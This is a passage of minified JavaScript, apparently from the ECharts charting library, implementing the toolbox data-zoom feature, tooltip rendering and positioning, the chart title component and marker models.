V32.1",back:"M22,1.4L9.9,13.5l12.3,12.3 M10.3,13.5H54.9v44.6 H10.3v-26"},title:t.getLocaleModel().get(["toolbox","dataZoom","title"]),brushStyle:{borderWidth:0,color:Cf.color.backgroundTint}}},e}(bA),aL={zoom:function(){var t=!this._isZoomActive;this.api.dispatchAction({type:"takeGlobalCursor",key:"dataZoomSelect",dataZoomSelectActive:t})},back:function(){this._dispatchZoomAction(function(t){var e=WA(t),n=e[e.length-1];e.length>1&&e.pop();var i={};return HA(n,function(t,n){for(var r=e.length-1;r>=0;r--)if(t=e[r][n]){i[n]=t;break}}),i}(this.ecModel))}};function sL(t){var e={xAxisIndex:t.get("xAxisIndex",!0),yAxisIndex:t.get("yAxisIndex",!0),xAxisId:t.get("xAxisId",!0),yAxisId:t.get("yAxisId",!0)};return null==e.xAxisIndex&&null==e.xAxisId&&(e.xAxisIndex="all"),null==e.yAxisIndex&&null==e.yAxisId&&(e.yAxisIndex="all"),e}tL="dataZoom",eL=function(t){var e=t.getComponent("toolbox",0),n=["feature","dataZoom"];if(e&&null!=e.get(n)){var i=e.getModel(n),r=[],o=Ca(t,sL(i));return nL(o.xAxisModels,function(t){return a(t,"xAxis","xAxisIndex")}),nL(o.yAxisModels,function(t){return a(t,"yAxis","yAxisIndex")}),r}function a(t,e,n){var o=t.componentIndex,a={type:"select",$fromToolbox:!0,filterMode:i.get("filterMode",!0)||"filter",id:iL+e+o};a[n]=o,r.push(a)}},ct(null==Zf.get(tL)&&eL),Zf.set(tL,eL);var lL=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.type="tooltip",e.dependencies=["axisPointer"],e.defaultOption={z:60,show:!0,showContent:!0,trigger:"item",triggerOn:"mousemove|click|mousewheel",alwaysShowContent:!1,renderMode:"auto",confine:null,showDelay:0,hideDelay:100,transitionDuration:.4,displayTransition:!0,enterable:!1,backgroundColor:Cf.color.neutral00,shadowBlur:10,shadowColor:"rgba(0, 0, 0, .2)",shadowOffsetX:1,shadowOffsetY:2,borderRadius:4,borderWidth:1,defaultBorderColor:Cf.color.border,padding:null,extraCssText:"",axisPointer:{type:"line",axis:"auto",animation:"auto",animationDurationUpdate:200,animationEasingUpdate:"exponentialOut",crossStyle:{color:Cf.color.borderShade,width:1,type:"dashed",textStyle:{}}},textStyle:{color:Cf.color.tertiary,fontSize:14}},e}(kf);function uL(t){var e=t.get("confine");return null!=e?!!e:"richText"===t.get("renderMode")}function cL(t){if(r.domSupported)for(var e=document.documentElement.style,n=0,i=t.length;n<i;n++)if(t[n]in e)return t[n]}var hL=cL(["transform","webkitTransform","OTransform","MozTransform","msTransform"]);function pL(t,e){if(!t)return e;e=qd(e,!0);var n=t.indexOf(e);return(t=-1===n?e:"-"+t.slice(0,n)+"-"+e).toLowerCase()}var dL=pL(cL(["webkitTransition","transition","OTransition","MozTransition","msTransition"]),"transition"),fL=pL(hL,"transform"),gL="position:absolute;display:block;border-style:solid;white-space:nowrap;z-index:9999999;"+(r.transform3dSupported?"will-change:transform;":"");function vL(t,e,n){var i=t.toFixed(0)+"px",o=e.toFixed(0)+"px";if(!r.transformSupported)return n?"top:"+o+";left:"+i+";":[["top",o],["left",i]];var a=r.transform3dSupported,s="translate"+(a?"3d":"")+"("+i+","+o+(a?",0":"")+")";return n?"top:0;left:0;"+fL+":"+s+";":[["top",0],["left",0],[hL,s]]}function yL(t,e,n,i){var o=[],a=t.get("transitionDuration"),s=t.get("backgroundColor"),l=t.get("shadowBlur"),u=t.get("shadowColor"),c=t.get("shadowOffsetX"),h=t.get("shadowOffsetY"),p=t.getModel("textStyle"),d=Xv(t,"html"),f=c+"px "+h+"px "+l+"px "+u;return o.push("box-shadow:"+f),e&&a>0&&o.push(function(t,e,n){var i="cubic-bezier(0.23,1,0.32,1)",o="",a="";return n&&(a="opacity"+(o=" "+t/2+"s "+i)+",visibility"+o),e||(o=" "+t+"s "+i,a+=(a.length?",":"")+(r.transformSupported?""+fL+o:",left"+o+",top"+o)),dL+":"+a}(a,n,i)),s&&o.push("background-color:"+s),E(["width","color","radius"],function(e){var n="border-"+e,i=qd(n),r=t.get(i);null!=r&&o.push(n+":"+r+("color"===e?"":"px"))}),o.push(function(t){var e=[],n=t.get("fontSize"),i=t.getTextColor();i&&e.push("color:"+i),e.push("font:"+t.getFont());var r=at(t.get("lineHeight"),Math.round(3*n/2));n&&e.push("line-height:"+r+"px");var o=t.get("textShadowColor"),a=t.get("textShadowBlur")||0,s=t.get("textShadowOffsetX")||0,l=t.get("textShadowOffsetY")||0;return o&&a&&e.push("text-shadow:"+s+"px "+l+"px "+a+"px "+o),E(["decoration","align"],function(n){var i=t.get(n);i&&e.push("text-"+n+":"+i)}),e.join(";")}(p)),null!=d&&o.push("padding:"+Kd(d).join("px ")+"px"),o.join(";")+";"}function mL(t,e,n,i,r){var o=e&&e.painter;if(n){var a=o&&o.getViewportRoot();a&&function(t,e,n,i,r){ne(ee,e,i,r,!0)&&ne(t,n,ee[0],ee[1])}(t,a,n,i,r)}else{t[0]=i,t[1]=r;var s=o&&o.getViewportRootOffset();s&&(t[0]+=s.offsetLeft,t[1]+=s.offsetTop)}t[2]=t[0]/e.getWidth(),t[3]=t[1]/e.getHeight()}var _L=function(){function t(t,e){if(this._show=!1,this._styleCoord=[0,0,0,0],this._enterable=!0,this._alwaysShowContent=!1,this._firstShow=!0,this._longHide=!0,r.wxa)return null;var n=document.createElement("div");n.domBelongToZr=!0,this.el=n;var i=this._zr=t.getZr(),o=e.appendTo,a=o&&(j(o)?document.querySelector(o):tt(o)?o:X(o)&&o(t.getDom()));mL(this._styleCoord,i,a,t.getWidth()/2,t.getHeight()/2),(a||t.getDom()).appendChild(n),this._api=t,this._container=a;var s=this;n.onmouseenter=function(){s._enterable&&(clearTimeout(s._hideTimeout),s._show=!0),s._inContent=!0},n.onmousemove=function(t){if(t=t||window.event,!s._enterable){var e=i.handler;de(i.painter.getViewportRoot(),t,!0),e.dispatch("mousemove",t)}},n.onmouseleave=function(){s._inContent=!1,s._enterable&&s._show&&s.hideLater(s._hideDelay)}}return t.prototype.update=function(t){if(!this._container){var e=this._api.getDom(),n=(o="position",(a=(r=e).currentStyle||document.defaultView&&document.defaultView.getComputedStyle(r))?o?a[o]:a:null),i=e.style;"absolute"!==i.position&&"absolute"!==n&&(i.position="relative")}var r,o,a,s=t.get("alwaysShowContent");s&&this._moveIfResized(),this._alwaysShowContent=s,this._enableDisplayTransition=t.get("displayTransition")&&t.get("transitionDuration")>0,this.el.className=t.get("className")||""},t.prototype.show=function(t,e){clearTimeout(this._hideTimeout),clearTimeout(this._longHideTimeout);var n=this.el,i=n.style,r=this._styleCoord;n.innerHTML?i.cssText=gL+yL(t,!this._firstShow,this._longHide,this._enableDisplayTransition)+vL(r[0],r[1],!0)+"border-color:"+nf(e)+";"+(t.get("extraCssText")||"")+";pointer-events:"+(this._enterable?"auto":"none"):i.display="none",this._show=!0,this._firstShow=!1,this._longHide=!1},t.prototype.setContent=function(t,e,n,i,r){var o=this.el;if(null!=t){var a="";if(j(r)&&"item"===n.get("trigger")&&!uL(n)&&(a=function(t,e,n){if(!j(n)||"inside"===n)return"";var i=t.get("backgroundColor"),r=t.get("borderWidth");e=nf(e);var o,a,s="left"===(o=n)?"right":"right"===o?"left":"top"===o?"bottom":"top",l=Math.max(1.5*Math.round(r),6),u="",c=fL+":";R(["left","right"],s)>-1?(u+="top:50%",c+="translateY(-50%) rotate("+(a="left"===s?-225:-45)+"deg)"):(u+="left:50%",c+="translateX(-50%) rotate("+(a="top"===s?225:45)+"deg)");var h=a*Math.PI/180,p=l+r,d=p*Math.abs(Math.cos(h))+p*Math.abs(Math.sin(h)),f=e+" solid "+r+"px;";return'<div style="'+["position:absolute;width:"+l+"px;height:"+l+"px;z-index:-1;",(u+=";"+s+":-"+Math.round(100*((d-Math.SQRT2*r)/2+Math.SQRT2*r-(d-p)/2))/100+"px")+";"+c+";","border-bottom:"+f,"border-right:"+f,"background-color:"+i+";"].join("")+'"></div>'}(n,i,r)),j(t))o.innerHTML=t+a;else if(t){o.innerHTML="",Y(t)||(t=[t]);for(var s=0;s<t.length;s++)tt(t[s])&&t[s].parentNode!==o&&o.appendChild(t[s]);if(a&&o.childNodes.length){var l=document.createElement("div");l.innerHTML=a,o.appendChild(l)}}}else o.innerHTML=""},t.prototype.setEnterable=function(t){this._enterable=t},t.prototype.getSize=function(){var t=this.el;return t?[t.offsetWidth,t.offsetHeight]:[0,0]},t.prototype.moveTo=function(t,e){if(this.el){var n=this._styleCoord;if(mL(n,this._zr,this._container,t,e),null!=n[0]&&null!=n[1]){var i=this.el.style;E(vL(n[0],n[1]),function(t){i[t[0]]=t[1]})}}},t.prototype._moveIfResized=function(){var t=this._styleCoord[2],e=this._styleCoord[3];this.moveTo(t*this._zr.getWidth(),e*this._zr.getHeight())},t.prototype.hide=function(){var t=this,e=this.el.style;this._enableDisplayTransition?(e.visibility="hidden",e.opacity="0"):e.display="none",r.transform3dSupported&&(e.willChange=""),this._show=!1,this._longHideTimeout=setTimeout(function(){return t._longHide=!0},500)},t.prototype.hideLater=function(t){!this._show||this._inContent&&this._enterable||this._alwaysShowContent||(t?(this._hideDelay=t,this._show=!1,this._hideTimeout=setTimeout(U(this.hide,this),t)):this.hide())},t.prototype.isShow=function(){return this._show},t.prototype.dispose=function(){clearTimeout(this._hideTimeout),clearTimeout(this._longHideTimeout);var t=this._zr;!function(t,e){function n(t){var e=t[te];e&&(e.clearMarkers&&e.clearMarkers(),delete t[te])}t&&n(t),e&&n(e)}(t&&t.painter&&t.painter.getViewportRoot(),this._container);var e=this.el;if(e){e.onmouseenter=e.onmousemove=e.onmouseleave=null;var n=e.parentNode;n&&n.removeChild(e)}this.el=this._container=null},t}(),xL=function(){function t(t){this._show=!1,this._styleCoord=[0,0,0,0],this._alwaysShowContent=!1,this._enterable=!0,this._zr=t.getZr(),SL(this._styleCoord,this._zr,t.getWidth()/2,t.getHeight()/2)}return t.prototype.update=function(t){var e=t.get("alwaysShowContent");e&&this._moveIfResized(),this._alwaysShowContent=e},t.prototype.show=function(){this._hideTimeout&&clearTimeout(this._hideTimeout),this.el.show(),this._show=!0},t.prototype.setContent=function(t,e,n,i,r){var o=this;$(t)&&ua(""),this.el&&this._zr.remove(this.el);var a=n.getModel("textStyle");this.el=new Ql({style:{rich:e.richTextStyles,text:t,lineHeight:22,borderWidth:1,borderColor:i,textShadowColor:a.get("textShadowColor"),fill:n.get(["textStyle","color"]),padding:Xv(n,"richText"),verticalAlign:"top",align:"left"},z:n.get("z")}),E(["backgroundColor","borderRadius","shadowColor","shadowBlur","shadowOffsetX","shadowOffsetY"],function(t){o.el.style[t]=n.get(t)}),E(["textShadowBlur","textShadowOffsetX","textShadowOffsetY"],function(t){o.el.style[t]=a.get(t)||0}),this._zr.add(this.el);var s=this;this.el.on("mouseover",function(){s._enterable&&(clearTimeout(s._hideTimeout),s._show=!0),s._inContent=!0}),this.el.on("mouseout",function(){s._enterable&&s._show&&s.hideLater(s._hideDelay),s._inContent=!1})},t.prototype.setEnterable=function(t){this._enterable=t},t.prototype.getSize=function(){var t=this.el,e=this.el.getBoundingRect(),n=wL(t.style);return[e.width+n.left+n.right,e.height+n.top+n.bottom]},t.prototype.moveTo=function(t,e){var n=this.el;if(n){var i=this._styleCoord;SL(i,this._zr,t,e),t=i[0],e=i[1];var r=n.style,o=bL(r.borderWidth||0),a=wL(r);n.x=t+o+a.left,n.y=e+o+a.top,n.markRedraw()}},t.prototype._moveIfResized=function(){var t=this._styleCoord[2],e=this._styleCoord[3];this.moveTo(t*this._zr.getWidth(),e*this._zr.getHeight())},t.prototype.hide=function(){this.el&&this.el.hide(),this._show=!1},t.prototype.hideLater=function(t){!this._show||this._inContent&&this._enterable||this._alwaysShowContent||(t?(this._hideDelay=t,this._show=!1,this._hideTimeout=setTimeout(U(this.hide,this),t)):this.hide())},t.prototype.isShow=function(){return this._show},t.prototype.dispose=function(){this._zr.remove(this.el)},t}();function bL(t){return Math.max(0,t)}function wL(t){var e=bL(t.shadowBlur||0),n=bL(t.shadowOffsetX||0),i=bL(t.shadowOffsetY||0);return{left:bL(e-n),right:bL(e+n),top:bL(e-i),bottom:bL(e+i)}}function SL(t,e,n,i){t[0]=n,t[1]=i,t[2]=t[0]/e.getWidth(),t[3]=t[1]/e.getHeight()}var ML=new jl({shape:{x:-1,y:-1,width:2,height:2}}),TL=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.prototype.init=function(t,e){if(!r.node&&e.getDom()){var n,i=t.getComponent("tooltip"),o=this._renderMode="auto"===(n=i.get("renderMode"))?r.domSupported?"html":"richText":n||"html";this._tooltipContent="richText"===o?new xL(e):new _L(e,{appendTo:i.get("appendToBody",!0)?"body":i.get("appendTo",!0)})}},e.prototype.render=function(t,e,n){if(!r.node&&n.getDom()){this.group.removeAll(),this._tooltipModel=t,this._ecModel=e,this._api=n;var i=this._tooltipContent;i.update(t),i.setEnterable(t.get("enterable")),this._initGlobalListener(),this._keepShow(),"richText"!==this._renderMode&&t.get("transitionDuration")?xy(this,"_updatePosition",50,"fixRate"):by(this,"_updatePosition")}},e.prototype._initGlobalListener=function(){var t=this._tooltipModel.get("triggerOn");uD("itemTooltip",this._api,U(function(e,n,i){"none"!==t&&(t.indexOf(e)>=0?this._tryShow(n,i):"leave"===e&&this._hide(i))},this))},e.prototype._keepShow=function(){var t=this._tooltipModel,e=this._ecModel,n=this._api,i=t.get("triggerOn");if("axis"!==t.get("trigger")&&(this._lastDataByCoordSys=null,this._cbParamsList=null),null!=this._lastX&&null!=this._lastY&&"none"!==i&&"click"!==i){var r=this;clearTimeout(this._refreshUpdateTimeout),this._refreshUpdateTimeout=setTimeout(function(){!n.isDisposed()&&r.manuallyShowTip(t,e,n,{x:r._lastX,y:r._lastY,dataByCoordSys:r._lastDataByCoordSys})})}},e.prototype.manuallyShowTip=function(t,e,n,i){if(i.from!==this.uid&&!r.node&&n.getDom()){var o=CL(i,n);this._ticket="";var a=i.dataByCoordSys,s=function(t,e,n){var i=Ia(t).queryOptionMap,r=i.keys()[0];if(!r||"series"===r)return;var o=Pa(e,r,i.get(r),{useDefault:!1,enableAll:!1,enableNone:!1}),a=o.models[0];if(!a)return;var s,l=n.getViewOfComponentModel(a);if(l.group.traverse(function(e){var n=hu(e).tooltipConfig;if(n&&n.name===t.name)return s=e,!0}),s)return{componentMainType:r,componentIndex:a.componentIndex,el:s}}(i,e,n);if(s){var l=s.el.getBoundingRect().clone();l.applyTransform(s.el.transform),this._tryShow({offsetX:l.x+l.width/2,offsetY:l.y+l.height/2,target:s.el,position:i.position,positionDefault:"bottom"},o)}else if(i.tooltip&&null!=i.x&&null!=i.y){var u=ML;u.x=i.x,u.y=i.y,u.update(),hu(u).tooltipConfig={name:null,option:i.tooltip},this._tryShow({offsetX:i.x,offsetY:i.y,target:u},o)}else if(a)this._tryShow({offsetX:i.x,offsetY:i.y,position:i.position,dataByCoordSys:a,tooltipOption:i.tooltipOption},o);else if(null!=i.seriesIndex){if(this._manuallyAxisShowTip(t,e,n,i))return;var c=fD(i,e),h=c.point[0],p=c.point[1];null!=h&&null!=p&&this._tryShow({offsetX:h,offsetY:p,target:c.el,position:i.position,positionDefault:"bottom"},o)}else null!=i.x&&null!=i.y&&(n.dispatchAction({type:"updateAxisPointer",x:i.x,y:i.y}),this._tryShow({offsetX:i.x,offsetY:i.y,position:i.position,target:n.getZr().findHover(i.x,i.y).target},o))}},e.prototype.manuallyHideTip=function(t,e,n,i){var r=this._tooltipContent;this._tooltipModel&&r.hideLater(this._tooltipModel.get("hideDelay")),this._lastX=this._lastY=this._lastDataByCoordSys=null,this._cbParamsList=null,i.from!==this.uid&&this._hide(CL(i,n))},e.prototype._manuallyAxisShowTip=function(t,e,n,i){var r=i.seriesIndex,o=i.dataIndex,a=e.getComponent("axisPointer").coordSysAxesInfo;if(null!=r&&null!=o&&null!=a){var s=e.getSeriesByIndex(r);if(s)if("axis"===kL([s.getData().getItemModel(o),s,(s.coordinateSystem||{}).model],this._tooltipModel).get("trigger"))return n.dispatchAction({type:"updateAxisPointer",seriesIndex:r,dataIndex:o,position:i.position}),!0}},e.prototype._tryShow=function(t,e){var n=t.target;if(this._tooltipModel){this._lastX=t.offsetX,this._lastY=t.offsetY;var i=t.dataByCoordSys;if(i&&i.length)this._showAxisTooltip(i,t);else if(n){var r,o;if("legend"===hu(n).ssrType)return;this._lastDataByCoordSys=null,this._cbParamsList=null,am(n,function(t){if(t.tooltipDisabled)return r=o=null,!0;r||o||(null!=hu(t).dataIndex?r=t:null!=hu(t).tooltipConfig&&(o=t))},!0),r?this._showSeriesItemTooltip(t,r,e):o?this._showComponentItemTooltip(t,o,e):this._hide(e)}else this._lastDataByCoordSys=null,this._cbParamsList=null,this._hide(e)}},e.prototype._showOrMove=function(t,e){var n=t.get("showDelay");e=U(e,this),clearTimeout(this._showTimout),n>0?this._showTimout=setTimeout(e,n):e()},e.prototype._showAxisTooltip=function(t,e){var n=this._ecModel,i=this._tooltipModel,r=[e.offsetX,e.offsetY],o=kL([e.tooltipOption],i),a=this._renderMode,s=[],l=Ev("section",{blocks:[],noHeader:!0}),u=[],c=new jv;E(t,function(t){E(t.dataByAxis,function(t){var e=n.getComponent(t.axisDim+"Axis",t.axisIndex),r=t.value,o=e.axis,h=o.scale.parse(r);if(e&&null!=r){var p=tD(r,o,n,t.seriesDataIndices,t.valueLabelOpt),d=Ev("section",{header:p,noHeader:!ht(p),sortBlocks:!0,blocks:[]});l.blocks.push(d),E(t.seriesDataIndices,function(r){var o=n.getSeriesByIndex(r.seriesIndex),l=r.dataIndexInside,f=o.getDataParams(l);if(!(f.dataIndex<0)){f.axisDim=t.axisDim,f.axisIndex=t.axisIndex,f.axisType=t.axisType,f.axisId=t.axisId,f.axisValue=Qb(e.axis,{value:h}),f.axisValueLabel=p,f.marker=c.makeTooltipMarker("item",nf(f.color),a);var g=rv(o.formatTooltip(l,!0,null)),v=g.frag;if(v){var y=kL([o],i).get("valueFormatter");d.blocks.push(y?A({valueFormatter:y},v):v)}g.text&&u.push(g.text),s.push(f)}})}})}),l.blocks.reverse(),u.reverse();var h=e.position,p=o.get("order"),d=Uv(l,c,a,p,n.get("useUTC"),o.get("textStyle"));d&&u.unshift(d);var f="richText"===a?"\n\n":"<br/>",g=u.join(f);this._showOrMove(o,function(){this._updateContentNotChangedOnAxis(t,s)?this._updatePosition(o,h,r[0],r[1],this._tooltipContent,s):this._showTooltipContent(o,g,s,Math.random()+"",r[0],r[1],h,null,c)})},e.prototype._showSeriesItemTooltip=function(t,e,n){var i=this._ecModel,r=hu(e),o=r.seriesIndex,a=i.getSeriesByIndex(o),s=r.dataModel||a,l=r.dataIndex,u=r.dataType,c=s.getData(u),h=this._renderMode,p=t.positionDefault,d=kL([c.getItemModel(l),s,a&&(a.coordinateSystem||{}).model],this._tooltipModel,p?{position:p}:null),f=d.get("trigger");if(null==f||"item"===f){var g=s.getDataParams(l,u),v=new jv;g.marker=v.makeTooltipMarker("item",nf(g.color),h);var y=rv(s.formatTooltip(l,!1,u)),m=d.get("order"),_=d.get("valueFormatter"),x=y.frag,b=x?Uv(_?A({valueFormatter:_},x):x,v,h,m,i.get("useUTC"),d.get("textStyle")):y.text,w="item_"+s.name+"_"+l;this._showOrMove(d,function(){this._showTooltipContent(d,b,g,w,t.offsetX,t.offsetY,t.position,t.target,v)}),n({type:"showTip",dataIndexInside:l,dataIndex:c.getRawIndex(l),seriesIndex:o,from:this.uid})}},e.prototype._showComponentItemTooltip=function(t,e,n){var i="html"===this._renderMode,r=hu(e),o=r.tooltipConfig.option||{},a=o.encodeHTMLContent;if(j(o)){o={content:o,formatter:o},a=!0}a&&i&&o.content&&((o=C(o)).content=ae(o.content));var s=[o],l=this._ecModel.getComponent(r.componentMainType,r.componentIndex);l&&s.push(l),s.push({formatter:o.content});var u=t.positionDefault,c=kL(s,this._tooltipModel,u?{position:u}:null),h=c.get("content"),p=Math.random()+"",d=new jv;this._showOrMove(c,function(){var n=C(c.get("formatterParams")||{});this._showTooltipContent(c,h,n,p,t.offsetX,t.offsetY,t.position,e,d)}),n({type:"showTip",from:this.uid})},e.prototype._showTooltipContent=function(t,e,n,i,r,o,a,s,l){if(this._ticket="",t.get("showContent")&&t.get("show")){var u=this._tooltipContent;u.setEnterable(t.get("enterable"));var c=t.get("formatter");a=a||t.get("position");var h=e,p=this._getNearestPoint([r,o],n,t.get("trigger"),t.get("borderColor"),t.get("defaultBorderColor",!0)).color;if(c)if(j(c)){var d=t.ecModel.get("useUTC"),f=Y(n)?n[0]:n;h=c,f&&f.axisType&&f.axisType.indexOf("time")>=0&&(h=Pd(f.axisValue,h,d)),h=tf(h,n,!0)}else if(X(c)){var g=U(function(e,i){e===this._ticket&&(u.setContent(i,l,t,p,a),this._updatePosition(t,a,r,o,u,n,s))},this);this._ticket=i,h=c(n,i,g)}else h=c;u.setContent(h,l,t,p,a),u.show(t,p),this._updatePosition(t,a,r,o,u,n,s)}},e.prototype._getNearestPoint=function(t,e,n,i,r){return"axis"===n||Y(e)?{color:i||r}:Y(e)?void 0:{color:i||e.color||e.borderColor}},e.prototype._updatePosition=function(t,e,n,i,r,o,a){var s=this._api.getWidth(),l=this._api.getHeight();e=e||t.get("position");var u=r.getSize(),c=t.get("align"),h=t.get("verticalAlign"),p=a&&a.getBoundingRect().clone();if(a&&p.applyTransform(a.transform),X(e)&&(e=e([n,i],o,r.el,p,{viewSize:[s,l],contentSize:u.slice()})),Y(e))n=No(e[0],s),i=No(e[1],l);else if($(e)){var d=e;d.width=u[0],d.height=u[1];var f=yf(d,{width:s,height:l});n=f.x,i=f.y,c=null,h=null}else if(j(e)&&a){var g=function(t,e,n,i){var r=n[0],o=n[1],a=Math.ceil(Math.SQRT2*i)+8,s=0,l=0,u=e.width,c=e.height;switch(t){case"inside":s=e.x+u/2-r/2,l=e.y+c/2-o/2;break;case"top":s=e.x+u/2-r/2,l=e.y-o-a;break;case"bottom":s=e.x+u/2-r/2,l=e.y+c+a;break;case"left":s=e.x-r-a,l=e.y+c/2-o/2;break;case"right":s=e.x+u+a,l=e.y+c/2-o/2}return[s,l]}(e,p,u,t.get("borderWidth"));n=g[0],i=g[1]}else{g=function(t,e,n,i,r,o,a){var s=n.getSize(),l=s[0],u=s[1];null!=o&&(t+l+o+2>i?t-=l+o:t+=o);null!=a&&(e+u+a>r?e-=u+a:e+=a);return[t,e]}(n,i,r,s,l,c?null:20,h?null:20);n=g[0],i=g[1]}if(c&&(n-=IL(c)?u[0]/2:"right"===c?u[0]:0),h&&(i-=IL(h)?u[1]/2:"bottom"===h?u[1]:0),uL(t)){g=function(t,e,n,i,r){var o=n.getSize(),a=o[0],s=o[1];return t=Math.min(t+a,i)-a,e=Math.min(e+s,r)-s,t=Math.max(t,0),e=Math.max(e,0),[t,e]}(n,i,r,s,l);n=g[0],i=g[1]}r.moveTo(n,i)},e.prototype._updateContentNotChangedOnAxis=function(t,e){var n=this._lastDataByCoordSys,i=this._cbParamsList,r=!!n&&n.length===t.length;return r&&E(n,function(n,o){var a=n.dataByAxis||[],s=(t[o]||{}).dataByAxis||[];(r=r&&a.length===s.length)&&E(a,function(t,n){var o=s[n]||{},a=t.seriesDataIndices||[],l=o.seriesDataIndices||[];(r=r&&t.value===o.value&&t.axisType===o.axisType&&t.axisId===o.axisId&&a.length===l.length)&&E(a,function(t,e){var n=l[e];r=r&&t.seriesIndex===n.seriesIndex&&t.dataIndex===n.dataIndex}),i&&E(t.seriesDataIndices,function(t){var n=t.seriesIndex,o=e[n],a=i[n];o&&a&&a.data!==o.data&&(r=!1)})})}),this._lastDataByCoordSys=t,this._cbParamsList=e,!!r},e.prototype._hide=function(t){this._lastDataByCoordSys=null,this._cbParamsList=null,t({type:"hideTip",from:this.uid})},e.prototype.dispose=function(t,e){!r.node&&e.getDom()&&(by(this,"_updatePosition"),this._tooltipContent.dispose(),pD("itemTooltip",e),this._tooltipContent=null,this._tooltipModel=null,this._lastDataByCoordSys=null,this._cbParamsList=null)},e.type="tooltip",e}(ay);function kL(t,e,n){var i,r=e.ecModel;n?(i=new td(n,r,r),i=new td(e.option,i,r)):i=e;for(var o=t.length-1;o>=0;o--){var a=t[o];a&&(a instanceof td&&(a=a.get("tooltip",!0)),j(a)&&(a={formatter:a}),a&&(i=new td(a,i,r)))}return i}function CL(t,e){return t.dispatchAction||U(e.dispatchAction,e)}function IL(t){return"center"===t||"middle"===t}var DL=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n.layoutMode={type:"box",ignoreSize:!0},n}return n(e,t),e.type="title",e.defaultOption={z:6,show:!0,text:"",target:"blank",subtext:"",subtarget:"blank",left:"center",top:Cf.size.m,backgroundColor:Cf.color.transparent,borderColor:Cf.color.primary,borderWidth:0,padding:5,itemGap:10,textStyle:{fontSize:18,fontWeight:"bold",color:Cf.color.primary},subtextStyle:{fontSize:12,color:Cf.color.quaternary}},e}(kf),AL=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.prototype.render=function(t,e,n){if(this.group.removeAll(),t.get("show")){var i=this.group,r=t.getModel("textStyle"),o=t.getModel("subtextStyle"),a=t.get("textAlign"),s=at(t.get("textBaseline"),t.get("textVerticalAlign")),l=new Ql({style:Op(r,{text:t.get("text"),fill:r.getTextColor()},{disableBox:!0}),z2:10}),u=l.getBoundingRect(),c=t.get("subtext"),h=new Ql({style:Op(o,{text:c,fill:o.getTextColor(),y:u.height+t.get("itemGap"),verticalAlign:"top"},{disableBox:!0}),z2:10}),p=t.get("link"),d=t.get("sublink"),f=t.get("triggerEvent",!0);l.silent=!p&&!f,h.silent=!d&&!f,p&&l.on("click",function(){rf(p,"_"+t.get("target"))}),d&&h.on("click",function(){rf(d,"_"+t.get("subtarget"))}),hu(l).eventData=hu(h).eventData=f?{componentType:"title",componentIndex:t.componentIndex}:null,i.add(l),c&&i.add(h);var g=i.getBoundingRect(),v=t.getBoxLayoutParams();v.width=g.width,v.height=g.height;var y=yf(v,_f(t,n).refContainer,t.get("padding"));a||("middle"===(a=t.get("left")||t.get("right"))&&(a="center"),"right"===a?y.x+=y.width:"center"===a&&(y.x+=y.width/2)),s||("center"===(s=t.get("top")||t.get("bottom"))&&(s="middle"),"bottom"===s?y.y+=y.height:"middle"===s&&(y.y+=y.height/2),s=s||"top"),i.x=y.x,i.y=y.y,i.markRedraw();var m={align:a,verticalAlign:s};l.setStyle(m),h.setStyle(m),g=i.getBoundingRect();var _=y.margin,x=t.getItemStyle(["color","opacity"]);x.fill=t.get("backgroundColor");var b=new jl({shape:{x:g.x-_[3],y:g.y-_[0],width:g.width+_[1]+_[3],height:g.height+_[0]+_[2],r:t.get("borderRadius")},style:x,subPixelOptimize:!0,silent:!0});i.add(b)}},e.type="title",e}(ay);function PL(t,e){if(!t)return!1;for(var n=Y(t)?t:[t],i=0;i<n.length;i++)if(n[i]&&n[i][e])return!0;return!1}function LL(t){fa(t,"label",["show"])}var OL=Ta(),RL=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n.createdBySelf=!1,n.preventAutoZ=!0,n}return n(e,t),e.prototype.init=function(t,e,n){this.mergeDefaultAndTheme(t,n),this._mergeOption(t,n,!1,!0)},e.prototype.isAnimationEnabled=function(){if(r.node)return!1;var t=this.__hostSeries;return this.getShallow("animation")&&t&&t.isAnimationEnabled()},e.prototype.mergeOption=function(t,e){this._mergeOption(t,e,!1,!1)},e.prototype._mergeOption=function(t,e,n,i){var r=this.mainType;n||e.eachSeries(function(t){var n=t.get(this.mainType,!0),o=OL(t)[r];n&&n.data?(o?o._mergeOption(n,e,!0):(i&&LL(n),E(n.data,function(t){t instanceof Array?(LL(t[0]),LL(t[1])):LL(t)}),A(o=this.createMarkerModelFromSeries(n,this,e),{mainType:this.mainType,seriesIndex:t.seriesIndex,name:t.name,createdBySelf:!0}),o.__hostSeries=t),OL(t)[r]=o):OL(t)[r]=null},this)},e.prototype.formatTooltip=function(t,e,n){var i=this.getData(),r=this.getRawValue(t),o=i.getName(t);return Ev("section",{header:this.name,blocks:[Ev("nameValue",{name:o,value:r,noName:!o,noValue:null==r})]})},e.prototype.getData=function(){return this._data},e.prototype.setData=function(t){this._data=t},e.prototype.getDataParams=function(t,e){var n=iv.prototype.getDataParams.call(this,t,e),i=this.__hostSeries;return i&&(n.seriesId=i.id,n.seriesName=i.name,n.seriesType=i.subType),n},e.getMarkerModelFromSeries=function(t,e){return OL(t)[e]},e.type="marker",e.dependencies=["series","grid","polar","geo"],e}(kf);B(RL,iv.prototype);var NL=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.prototype.createMarkerModelFromSeries=function(t,n,i){return new e(t,n,i)},e.type="markPoint",e.defaultOption={z:5,symbol:"pin",symbolSize:50,tooltip:{trigger:"item"},label:{show:!0,position:"inside"},itemStyle:{borderWidth:2},emphasis:{label:{show:!0}}},e}(RL);function BL(t){return!(isNaN(parseFloat(t.x))&&isNaN(parseFloat(t.y)))}function zL(t,e,n,i,r,o,a){var s=[],l=Jx(e,r)?e.getCalculationInfo("stackResultDimension"):r,u=WL(e,l,t),c=e.hostModel.indicesOfNearest(n,l,u)[0];s[o]=e.get(i,c),s[a]=e.get(l,c);var h=e.get(r,c),p=Vo(e.get(r,c));return(p=Math.min(p,20))>=0&&(s[a]=+s[a].toFixed(p)),[s,h]}var 